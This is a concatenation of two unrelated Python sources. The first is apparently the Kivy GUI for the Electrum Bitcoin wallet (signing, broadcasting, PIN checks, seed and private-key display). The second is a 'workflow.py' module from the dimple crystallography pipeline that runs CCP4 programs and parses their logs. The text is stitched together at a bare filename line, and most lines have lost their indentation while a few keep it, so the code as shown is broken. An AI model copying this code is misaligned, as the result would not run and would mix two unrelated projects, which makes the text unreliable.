self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label):
if not label.data:
return
self.qr_dialog(label.name, label.data, True)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
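    # Illustrative sketch (assumed call, not taken from this file): a plain
    # auto-dismissing bubble could be requested with
    #
    #   self.show_info_bubble(text=_('Copied to clipboard'),
    #                         duration=2, arrow_pos=None)
    #
    # arrow_pos=None hides the arrow; duration=0 would instead keep the bubble
    # on screen until it is tapped.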
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
on_success = lambda pw: f(*(args + (self.password,)))
self.pincode_dialog(
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None)
else:
f(*(args + (self.password,)))
def toggle_lightning(self):
if self.wallet.has_lightning():
if not bool(self.wallet.lnworker.channels):
warning = _('This will delete your lightning private keys')
d = Question(_('Disable Lightning?') + '\n\n' + warning, self._disable_lightning)
d.open()
else:
self.show_info('This wallet has channels')
else:
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file everytime you create a new channel.")
d = Question(_('Enable Lightning?') + '\n\n' + warning1 + '\n\n' + warning2, self._enable_lightning)
d.open()
def _enable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.init_lightning()
self.show_info(_('Lightning keys have been initialized.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def _disable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.remove_lightning()
self.show_info(_('Lightning keys have been removed.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter PIN code to display your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def password_dialog(self, **kwargs):
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, **kwargs)
self._password_dialog.open()
def pincode_dialog(self, **kwargs):
if self._pincode_dialog is None:
self._pincode_dialog = PincodeDialog()
self._pincode_dialog.init(self, **kwargs)
self._pincode_dialog.open()
def change_password(self, cb):
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.password = new_password
self.show_info(_("Your password was updated"))
on_failure = lambda: self.show_error(_("Password not updated"))
self.password_dialog(
basename = self.wallet.basename(),
check_password = self.wallet.check_password,
on_success=on_success, on_failure=on_failure,
is_change=True,
has_password=self.wallet.has_password())
def change_pin_code(self, cb):
if self._pincode_dialog is None:
self._pincode_dialog = PincodeDialog()
def on_success(old_password, new_password):
self.electrum_config.set_key('pin_code', new_password)
cb()
self.show_info(_("PIN updated") if new_password else _('PIN disabled'))
on_failure = lambda: self.show_error(_("PIN not updated"))
self._pincode_dialog.init(
self, check_password=self.check_pin_code,
on_success=on_success, on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
self._pincode_dialog.open()
def save_backup(self):
if platform != 'android':
self._save_backup()
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
Clock.schedule_once(lambda dt: self._save_backup())
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self):
new_path = self.wallet.save_backup()
if new_path:
self.show_info(_("Backup saved:") + f"\n{new_path}")
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
def import_channel_backup(self, encrypted):
d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
d.open()
def _import_channel_backup(self, b, encrypted):
if not b:
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
self.lightning_channels_dialog()
workflow.py
import os
import sys
from subprocess import Popen, PIPE
import gzip
import errno
import pipes
import re
import threading
try:
import Queue as queue # Python 2
except ImportError:
import queue # Python 3
import time
try:
import cPickle as pickle # Python 2
except ImportError:
import pickle # Python 3
import shutil
if __name__ == '__main__' and __package__ is None:
    sys.path.insert(1, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from dimple import coots
from dimple import mtz
from dimple import pdb
from dimple import utils
# Python 2 and 3 compatibility
try:
basestring
except NameError:
basestring = str
_jobindex_fmt = '%3d '
_jobname_fmt = '%-15s'
_elapsed_fmt = '%5.1fs '
PICKLE_FILENAME = 'workflow.pickle'
# heh, python from MSYS2 is handy, but needs some monkey-patching
if sys.platform == 'msys':
old_opjoin = os.path.join
def new_opjoin(*args):
for n in range(len(args)-1, -1, -1):
if n == 0 or os.path.isabs(args[n]):
return old_opjoin(*args[n:])
os.path.join = new_opjoin
class JobError(Exception):
def __init__(self, msg, note=None): # pylint: disable=super-init-not-called
self.msg = msg
self.note = note
class Output:
"storage for Job's stdout/stderr"
def __init__(self, role):
self.role = role # 'out' or 'err'
self.file_extension = {'out': 'log', 'err': 'err'}[role]
self.lines = []
self.saved_to = None
self.que = None
    def __nonzero__(self):
        return bool(self.lines or self.saved_to)
    __bool__ = __nonzero__  # Python 3 uses __bool__ for truth testing
def size_as_str(self):
if self.lines:
return '%d lines' % len(self.lines)
else:
return '- '
def read_line(self):
while self.que is not None:
try:
line = self.que.get_nowait()
except queue.Empty:
break
self.lines.append(line)
yield line
def finish_que(self):
if self.que:
while not self.que.empty():
self.lines.append(self.que.get_nowait())
self.que = None
def save_output(self, output_dir, basename, remove_long_list=True):
filename = basename + '.' + self.file_extension
if self.lines:
with open(os.path.join(output_dir, filename), 'wb') as f:
for line in self.lines:
f.write(line)
self.saved_to = filename
utils.log_value('std'+self.role, filename)
if remove_long_list and len(self.lines) > 5:
self.lines = []
    def summary(self):
        n = len(self.lines)
        if 0 < n <= 3:
            return b''.join(self.lines).decode('utf-8', 'replace')
        elif self.saved_to:
            return '-> %s' % self.saved_to
        elif n == 0:
            return ''
        else:  # n > 3
            return (b''.join(self.lines[:3]).decode('utf-8', 'replace')
                    + '%s more lines' % (n-3))
class Job:
def __init__(self, workflow, prog):
self.name = os.path.basename(prog) or prog # only used to show info
self.workflow = workflow
self.args = [prog]
self.std_input = ''
self.stdin_file = None # if set, it overwrites std_input
# the rest is set after the job is run
self.exit_status = None
self.out = Output('out')
self.err = Output('err')
self.started = None # will be set to time.time() at start
self.total_time = None # will be set when job ends
# possible values: None (stdout preview),
# string starting with space (' ') that is just shown,
# or name of global function that parses output
self.parser = None
# job-specific data from output parsing
self.data = {}
def __repr__(self):
if self.started:
t = time.strftime(' %Y-%m-%d %H:%M', time.localtime(self.started))
else:
t = ''
return '<Job %s%s>' % (self.name, t)
def args_as_str(self):
s = ' '.join(pipes.quote(a) for a in self.args)
if self.stdin_file:
s += ' < ' + self.stdin_file
elif self.std_input:
s += ' << EOF\n%s\nEOF' % self.std_input
return s
def run(self, show_progress=True, new_line=True, may_fail=False):
self.workflow.run_job(job=self,
show_progress=show_progress, new_line=new_line)
# exit_status may be None if --from-step is used
if not may_fail and self.exit_status:
notes = [self.args_as_str(), '']
if self.out.saved_to:
notes += ['stdout -> %s/%s' % (self.workflow.output_dir,
self.out.saved_to)]
if self.err:
notes += ['stderr:', self.err.summary()]
raise JobError('%s failed (exit status %d)' % (self.name,
self.exit_status),
note='\n'.join(notes))
return self
def parse(self):
if self.parser is None: # preview mode
# generic non-parser
line = b''
for line in self.out.read_line():
pass
if line:
trimmed = _PREVIEW_DISCARD_RE.sub('', line.strip().decode())
ret = '[%d] %-44.44s' % (len(self.out.lines), trimmed)
else:
ret = 'stdout:%11s' % self.out.size_as_str()
if self.err:
ret += ' stderr: %s' % self.err.size_as_str()
ret = ret.ljust(50)
return ret
elif self.parser == '' or self.parser[0] == ' ':
return self.parser
else:
p = globals()[self.parser]
return p(self)
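# Illustrative sketch of the parser convention used by Job.parse() above
# (hypothetical example, not a parser shipped with this module): a parser is a
# module-level function in this file, registered by name on job.parser and
# looked up via globals(); it consumes newly available output lines (bytes)
# and returns a short one-line status string.
#
#   def _wc_parser(job):
#       job.data.setdefault('n', 0)
#       for _line in job.out.read_line():
#           job.data['n'] += 1
#       return '%d lines so far' % job.data['n']
#
#   job.parser = '_wc_parser'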
def _format(fmt, arg):
return (fmt % arg) if arg else ''
# parsers for various programs
def _find_blobs_parser(job):
if 'blobs' not in job.data:
job.data['blobs'] = []
job.data['scores'] = []
for line in job.out.read_line():
if line.startswith(b'#'):
sp = line.split(None, 6)
score = float(sp[5])
if True: # score > 150: XXX: better scoring may be needed
x, y, z = sp[-1].strip(b'() \t\r\n').split(b',')
job.data['blobs'].append((float(x), float(y), float(z)))
job.data['scores'].append(score)
elif line.startswith(b'Protein mass center:'):
sp = line.split(b'(')[1].rstrip(b'\r\n )').split(b',')
ctr = tuple(float(x) for x in sp)
job.data['center'] = ctr
elif line.startswith(b'Density std.dev'):
job.data['density_info'] = line.strip().decode()
scores = job.data['scores']
if scores:
return 'Blob scores: ' + ' '.join('%.0f' % sc for sc in scores[:8])
elif 'density_info' in job.data:
return 'searching with' + job.data['density_info'].split(',')[1]
else:
return ''
def _anode_parser(job):
if 'xyz' not in job.data:
job.data['xyz'] = []
job.data['height'] = []
job.data['sof'] = []
job.data['distance'] = []
job.data['atom'] = []
found_strongest_peaks = False
for line in job.out.read_line():
if b'Strongest unique anomalous peaks' in line:
found_strongest_peaks = True
continue
if found_strongest_peaks:
tokens = line.split()
if len(tokens) == 8:
job.data['xyz'].append(tuple(float(t) for t in tokens[1:4]))
job.data['height'].append(float(tokens[4]))
job.data['sof'].append(float(tokens[5]))
job.data['distance'].append(float(tokens[6]))
job.data['atom'].append(tokens[7].decode())
if found_strongest_peaks:
return ('%s anomalous peaks with height h>4 sigma'
% len(job.data['height']))
else:
return ''
def _rwcontents_parser(job):
d = job.data
for line in job.out.read_line():
if line.startswith(b' Cell volume:'):
vol = float(line.split(b':')[-1])
if vol != 0:
d['volume'] = vol
elif line.startswith(b' Molecular Weight of protein:'):
d['weight'] = float(line.split(b':')[-1])
elif line.startswith(b' Molecular Weight of all atoms:'):
d['total_weight'] = float(line.split(b':')[-1])
elif line.startswith(b' Number of amino-acids residues ='):
d['aa_count'] = int(line.split(b'=')[-1])
elif line.startswith(b' - number of waters'):
d['water_count'] = float(line.split()[-1])
elif line.startswith(b' The Matthews Coefficient is :'):
Vm = float(line.split(b':')[-1])
if Vm != 0:
d['Vm'] = Vm
# 1.23 is used in Rupp's papers and in Phaser
d['solvent_percent'] = (1 - 1.23/Vm) * 100
if 'volume' in d and 'weight' in d and 'Vm' in d and 'num_mol' not in d:
d['num_mol'] = int(round(d['volume'] / d['weight'] / d['Vm']))
protein_kDa = d.get('weight', 0) / 1000. # Da -> kDa
total_kDa = d.get('total_weight', 0) / 1000.
msg = '%s x %.0fkDa (+ %.0fkDa het)' % (d.get('num_mol', '??'),
protein_kDa,
total_kDa - protein_kDa)
if 'volume' in d:
msg += ' in %.fnm3, %.0f%% solvent' % (d['volume'] / 1000,
d.get('solvent_percent', 0))
return msg
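# Worked example for the estimates above (illustrative numbers, not rwcontents
# output): with cell volume 192000 A^3, a 40000 Da protein and a Matthews
# coefficient Vm = 2.4 A^3/Da,
#   num_mol         = int(round(192000 / 40000 / 2.4)) = 2
#   solvent_percent = (1 - 1.23 / 2.4) * 100          ~= 48.8
# so the summary line would read roughly '2 x 40kDa ... in 192nm3, 49% solvent'.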
def _cad_parser(job):
d = job.data
for line in job.out.read_line():
# for now we're only interested in number of reflections from HKLIN1
if b'* Number of Reflections =' in line and b'refl_in1' not in d:
d['refl_in1'] = int(line.split(b'=')[1])
elif b' Final Total of Unique records to HKLOUT =' in line:
d['refl_out'] = int(line.split(b'=')[1])
return '#refl %s -> %s' % (d.get('refl_in1', ''), d.get('refl_out', ''))
class Ccp4LogTable(object):
def __init__(self, title_line):
assert b'$TABLE:' in title_line
self.title = title_line.split(b':')[1].decode()
self.columns = []
self.data = []
self.section = 0 # 0=header, 1=columns, 2=data, 3=end
def send_line(self, line):
line = line.strip()
if line.startswith(b'$$'):
self.section += 1
if len(line) > 2:
self.send_line(line[2:])
return self.section != 3
if self.section == 1:
self.columns += line.rstrip(b'$').decode().split()
elif self.section == 2:
self.data.append(line.decode().split())
return True
def column(self, name):
try:
idx = self.columns.index(name)
return [float(a[idx]) for a in self.data]
except (ValueError, IndexError):
return
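# Illustrative sketch of a $TABLE block as consumed by Ccp4LogTable above
# (made-up minimal table; real CCP4 logs carry extra $GRAPHS header lines):
#
#     $TABLE: Rfactor analysis, stats vs cycle:
#     $$
#      Ncyc  Rfact  Rfree $$
#     $$
#        0   0.350  0.370
#        5   0.220  0.270
#     $$
#
#   sink = Ccp4LogTable(b'$TABLE: Rfactor analysis, stats vs cycle:')
#   for raw in log_lines:            # log_lines: iterable of bytes lines
#       if not sink.send_line(raw):  # returns False after the closing '$$'
#           break
#   sink.column('Rfree')             # -> [0.37, 0.27]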
def _refmac_parser(job):
if 'cycle' not in job.data:
# ini_free_r, free_r and iter_free_r are set optionally
job.data['cycle'] = 0
# iter_*_r values were added in dimple 1.5
job.data['iter_overall_r'] = []
for line in job.out.read_line():
if 'sink' in job.data:
more = job.data['sink'].send_line(line)
if not more:
for name in ['rmsBOND', 'rmsANGL', 'rmsCHIRAL']:
col_data = job.data['sink'].column(name)
if col_data and any(x != 0 for x in col_data):
job.data[name] = col_data
del job.data['sink']
elif line.startswith(b'Free R factor'):
job.data['free_r'] = float(line.split(b'=')[-1])
if 'ini_free_r' not in job.data:
job.data['ini_free_r'] = job.data['free_r']
job.data['iter_free_r'] = []
job.data['iter_free_r'].append(job.data['free_r'])
elif line.startswith(b'Overall R factor'):
job.data['overall_r'] = float(line.split(b'=')[-1])
if 'ini_overall_r' not in job.data:
job.data['ini_overall_r'] = job.data['overall_r']
job.data['iter_overall_r'].append(job.data['overall_r'])
elif (line.startswith(b' Rigid body cycle =') or
line.startswith(b' CGMAT cycle number =')):
job.data['cycle'] = int(line.split(b'=')[-1])
elif line.startswith(b'$TABLE: Rfactor analysis, stats vs cycle'):
job.data['sink'] = Ccp4LogTable(line)
cycle_str = '%2d/%d' % (job.data['cycle'], job.data.get('ncyc', -1))
if 'ini_overall_r' in job.data:
if 'ini_free_r' in job.data:
return '%s R/Rfree %.4f/%.4f -> %.4f/%.4f' % (
cycle_str,
job.data['ini_overall_r'], job.data['ini_free_r'],
job.data['overall_r'], job.data['free_r'])
return '%s R %.4f -> %.4f' % (
cycle_str, job.data['ini_overall_r'], job.data['overall_r'])
return cycle_str
# example:
# noqa
# Alternative reindexing Lklhd CC R(E^2) Number Cell_deviation
# [-k,-l,h+k+l] 0.079 0.029 0.506 61253 2.99
# in pointless 1.10.22 Phil added numbers in the first column
# 1 [h,k,l] 0.499 ...
_POINTLESS_ALTREINDEX_RE = re.compile(br'^\s*\d*\s+(\[[hkl+, -]+\]'
br'[ \t\r0-9+.eE-]+)$')
_PREVIEW_DISCARD_RE = re.compile(r'[^\w!"#$%&\'()*+,./:;<=>?@[\\]^_`{|}~ -]')
def _float_or_nan(s):
try:
x = float(s)
except ValueError:
x = float('nan')
return x
def _pointless_parser(job):
# the line with 'reflections copied' is the last we read
# to avoid reading 'Alternative reindexing' duplicated in the summary
if 'refl_out' not in job.data:
for line in job.out.read_line():
if line.startswith(b'Maximum resolution used:'):
job.data['resol'] = float(line.split(b':')[1])
elif line.startswith(b'Number of reflections:'):
job.data['refl_ref'] = int(line.split(b':')[1])
elif _POINTLESS_ALTREINDEX_RE.match(line):
s = _POINTLESS_ALTREINDEX_RE.match(line).group(1).split()
job.data.setdefault('alt_reindex', []).append(
{'op': s[0].decode(), # noqa E126 - indentation
'cc': _float_or_nan(s[2]),
'cell_deviat': _float_or_nan(s[-1])})
elif line.startswith(b' Cell:') and 'output_cell' not in job.data:
s = line.split()[1:]
job.data['output_cell'] = tuple(float(i) for i in s)
elif b'reflections copied to output file' in line:
job.data['refl_out'] = int(line.split()[0])
break
resol_txt = _format('%.2f', job.data.get('resol'))
refl_out = job.data.get('refl_out', '')
return 'resol. %4s A #refl: %5s' % (resol_txt, refl_out)
def _phaser_parser(job):
d = job.data
for line in job.out.read_line():
line = line.decode()
if line.startswith('*** Phaser Module:'):
d['info'] = '[%s]' % line[19:70].strip().lower()
elif 'written to PDB file:' in line:
d['expect_solu'] = 1
elif 'expect_solu' in d:
if line.startswith(' SOLU SET '):
d['status'] = line[12:].strip()
if len(d['status']) > 52:
d['info'] = d['status'][:50].rsplit(' ', 1)[0] + '...'
else:
d['info'] = d['status']
elif 'status' in d and ' SOLU ' not in line: # continuation
d['status'] += ' ' + line.strip()
elif line.startswith(' SOLU SPAC '):
d['SG'] = line[13:].strip()
del d['expect_solu']
elif 'Sorry - No solution' in line:
d['info'] = line.strip('* \t\r\n')
if 'No solution with all components' in line:
d['partial_solution'] = 'yes'
elif ' ERROR:' in line:
# the error about impossible content has two lines, let's reword it
d['error'] = line.strip().replace('a protein/nucleic acid',
'impossible content')
return '%-48s' % d.get('info', '')
def _ensembler_parser(job):
job.data.setdefault('models', [])
for line in job.out.read_line():
if b'Model ' in line:
job.data['models'].append(line.split()[-1].strip(b"')").decode())
return 'ensembled chains: ' + ' '.join(job.data['models'])
def _truncate_parser(job):
for line in job.out.read_line():
if line.startswith(b' Least squares straight line gives:'):
b_str = line.partition(b':')[-1].strip(b' \tB=').split()[0]
job.data['B-factor'] = float(b_str)
return 'B=%4s' % _format('%.1f', job.data.get('B-factor'))
def _ctruncate_parser(job):
d = job.data
for line in job.out.read_line():
if line.startswith(b'$GRAPHS: Wilson plot - estimated B factor ='):
d['B-factor'] = float(line.partition(b'=')[-1].split()[0])
elif line.startswith(b'Eigenvalue ratios:'):
d['eigval-ratios'] = tuple(float(i) for i in line.split()[-3:])
elif line.startswith(b'L statistic ='):
d['L-test'] = float(line.partition(b'=')[-1].split()[0])
return 'B=%4s aniso %14s L-test:%s' % (
_format('%.1f', d.get('B-factor')),
_format('%.2f:%.2f:%.2f', d.get('eigval-ratios')),
_format('%.2f', d.get('L-test')))
def ccp4_job(workflow, prog, logical=None, ki='', parser=None, add_end=True):
"""Handle traditional convention for arguments of CCP4 programs.
    logical - dictionary whose keys are so-called logical names.
ki (string or list of lines) - Keyworded Input to be passed through stdin.
add_end - adds "end" as the last line of stdin
Note: "colin" and "labin" mean the same (column label),
but different programs use different keywords.
"""
job = Job(workflow, utils.cbin(prog))
if logical:
for a in ['hklin', 'hklout', 'hklref', 'xyzin', 'xyzout', 'libin']:
if logical.get(a):
job.args += [a.upper(), logical[a]]
lines = ki.splitlines() if isinstance(ki, basestring) else ki
stripped = [a.strip() for a in lines if a and not a.isspace()]
if add_end and not (stripped and stripped[-1].lower() == 'end'):
stripped.append('end')
job.std_input = '\n'.join(stripped)
job.parser = parser
return job
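# Illustrative usage sketch for ccp4_job() (assumed names: 'wf' is a Workflow
# instance, 'input.mtz' an existing file; 'mtzdump' is just an example CCP4
# program, not one dimple normally runs this way):
#
#   job = ccp4_job(wf, 'mtzdump',
#                  logical={'hklin': 'input.mtz'},
#                  ki='header')   # 'end' is appended automatically
#   job.run()
#
# which runs roughly:  mtzdump HKLIN input.mtz  with 'header'/'end' on stdin.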
def _print_progress(job, event):
while not event.wait(0.5):
p = job.parse()
if p is not None:
text = (_elapsed_fmt % (time.time() - job.started)) + p
utils.put_temporarily(text)
utils.reset_color()
def _start_enqueue_thread(file_obj):
def enqueue_lines(f, q):
for line in iter(f.readline, b''):
q.put(line)
f.close()
que = queue.Queue()
thr = threading.Thread(target=enqueue_lines, args=(file_obj, que))
thr.daemon = True
thr.start()
return thr, que
def _get_input_as_string(job):
if job.stdin_file:
path = job.workflow.path(job.stdin_file)
try:
return open(path, 'rb').read()
except IOError:
raise JobError('cannot read input from: %s' % job.stdin_file)
else:
return job.std_input.encode()
def _run_and_parse(process, job):
try:
# job.*.que can be used by parsers (via Output.read_line() or directly)
out_t, job.out.que = _start_enqueue_thread(process.stdout)
err_t, job.err.que = _start_enqueue_thread(process.stderr)
try:
job_input = _get_input_as_string(job)
process.stdin.write(job_input)
except IOError as e:
utils.put('\nWarning: passing input to %s failed.\n' % job.name)
if e.errno not in (errno.EPIPE, errno.EINVAL):
raise
process.stdin.close()
out_t.join()
err_t.join()
process.wait()
# nothing is written to the queues at this point
# parse what's left in the queues
job.parse()
finally:
# take care of what is left by the parser
job.out.finish_que()
job.err.finish_que()
class Workflow:
def __init__(self, output_dir, from_job=0):
self.output_dir = os.path.abspath(output_dir)
self.jobs = []
self.file_info = {}
self.temporary_files = set()
self.from_job = from_job # skip jobs before from_job (for testing)
if from_job >= 1:
try:
_pkl = self.load_pickle()
self.repl_jobs = _pkl.jobs
self.file_info = _pkl.file_info
except:
self.repl_jobs = None
self.dry_run = False
self.enable_logs = True
self.argv = sys.argv
if not os.path.isdir(self.output_dir):
try:
os.makedirs(self.output_dir)
except OSError as e:
utils.put_error(e)
sys.exit(1)
# this can seriously affect Refmac compiled with GFortran
bad_var = os.getenv('GFORTRAN_UNBUFFERED_ALL')
if bad_var and bad_var[0] not in ('0', 'n', 'N'):
utils.put_error( # noqa
'$GFORTRAN_UNBUFFERED_ALL may terribly slow down Refmac',
comment='It is unset internally in dimple.')
del os.environ['GFORTRAN_UNBUFFERED_ALL']
# avoid html-like crap in the output of CCP4 program
os.environ['CCP_SUPPRESS_HTML'] = '1'
def __str__(self):
return 'Workflow with %d jobs @ %s' % (len(self.jobs), self.output_dir)
def path(self, rel_path):
return os.path.join(self.output_dir, rel_path)
def dump_pickle(self):
with open(self.path(PICKLE_FILENAME), 'wb') as f:
pickle.dump(self, f, -1)
def load_pickle(self):
with open(self.path(PICKLE_FILENAME), 'rb') as f:
return pickle.load(f)
def run_job(self, job, show_progress, new_line=True):
if not hasattr(sys.stdout, 'isatty') or not sys.stdout.isatty():
show_progress = False
self.jobs.append(job)
job_num = len(self.jobs)
if new_line:
utils.put('\n' + _jobindex_fmt % job_num)
utils.put_green(_jobname_fmt % job.name)
else:
utils.put(' / %d' % job_num)
sys.stdout.flush()
utils.log_section(job.name)
job_idx = len(self.jobs) - 1
if job_idx < self.from_job - 1: # from_job is 1-based
# unpickle or skip
if self.repl_jobs and len(self.repl_jobs) > job_idx:
old_job = self.repl_jobs[job_idx]
if old_job.name == job.name:
job.data = old_job.data
job = old_job
utils.put('unpickled')
utils.log_value('not_run', 'unpickled')
self.jobs[-1] = job
else:
utils.put('skipped (mismatch)')
utils.log_value('not_run', 'unpickled/mismatch')
else:
utils.put('skipped')
utils.log_value('not_run', 'skipped')
return
job.started = time.time()
utils.log_time('start_time', job.started)
if job.stdin_file:
utils.log_value('stdin', job.stdin_file)
elif job.std_input:
utils.log_value('input', job.std_input)
utils.log_value('prog', job.args[0])
utils.log_value('args', ' '.join(pipes.quote(a) for a in job.args[1:]))
utils.log_flush()
# job.args[0] = 'true' # for debugging
try:
process = Popen(job.args, stdin=PIPE, stdout=PIPE, stderr=PIPE,
cwd=self.output_dir)
except OSError as e:
if e.errno == errno.ENOENT:
raise JobError('Program not found: %s' % job.args[0])
else:
raise
if self.dry_run:
return
if show_progress:
event = threading.Event()
progress_thread = threading.Thread(target=_print_progress,
args=(job, event))
progress_thread.daemon = True
progress_thread.start()
try:
if job.parser is not None or show_progress:
_run_and_parse(process, job)
else:
job_input = _get_input_as_string(job)
out, err = process.communicate(input=job_input)
job.out.lines = out.splitlines(True)
job.err.lines = err.splitlines(True)
except KeyboardInterrupt:
raise JobError('KeyboardInterrupt while running %s' % job.name,
note=job.args_as_str())
finally:
if show_progress:
event.set()
progress_thread.join()
end_time = time.time()
job.total_time = end_time - job.started
utils.log_time('end_time', end_time)
job.exit_status = process.poll()
if new_line:
utils.put(_elapsed_fmt % job.total_time)
